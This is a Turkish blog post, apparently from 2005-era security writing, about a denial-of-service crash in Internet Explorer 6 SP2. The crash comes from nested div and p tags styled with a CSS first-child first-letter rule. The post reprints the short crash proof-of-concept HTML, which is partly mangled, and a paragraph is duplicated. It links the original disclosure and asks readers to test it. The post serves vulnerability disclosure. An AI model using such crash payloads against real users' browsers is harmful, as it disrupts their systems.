Internet Explorer’da <DIV> açığı

Şuan itibariyle internet explorer’in "Internet Explorer Version 6.0.2900.2180.xpsp_sp2" versiyonunda bir  HTML etiketi olan <DIV> den kaynaklanan ve iexploer.exe nin o anki kopyasının çökmesine yol açan bir kodlama hatası var. Explorer da ki açık henüz DOS (Denial of Service) kategorisinde ama "Remote Code Execution" için exploit yazılmadığından/yazılamayacağından emin olamayız.


Şuan itibariyle internet explorer’in “Internet Explorer Version 6.0.2900.2180.xpsp_sp2” versiyonunda bir HTML etiketi olan
den kaynaklanan ve iexploer.exe nin o anki kopyasının çökmesine yol açan bir kodlama hatası var. Explorer da ki açık henüz DOS (Denial of Service) kategorisinde ama “Remote Code Execution” için exploit yazılmadığından/yazılamayacağından emin olamayız.

Exploitin kodunu yayınlayan siteye buradan ulaşabilirsiniz.

<head>
<
style><!–
#page div p:first-child:first-letter {
border-bottom: 2px ridge #F5DEB3;
}
//–>

</
style>
</
head>
<
body><div id=“page”><div><p><strong>Tank</strong></p>

Yukarıdaki html kodlarını bir htm dosyasına kaydedip internet explorer’da görüntülemeye calıştığımızda aşağıdaki gibi bir hata mesajı alıyoruz ve ardından pencere kapatılıyor.

Kodu buraya tıklayarak deneyebilirsiniz.

Exploitin yayınlandığı sayfa http://rgod.altervista.org/ie_6_sp2_crash.html

Önemli: Internet Exploer’ın hangi versiyonlarının etkilendiğini anlamamız açısından kodu test edip kullandığınız tarayıcının versiyon numarasıyla birlikte sonucu yazarsanız yararlı olacaktır.

Yazan: Tankado

Yazar: Özgür Koca

Yazar - Tankado.com

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.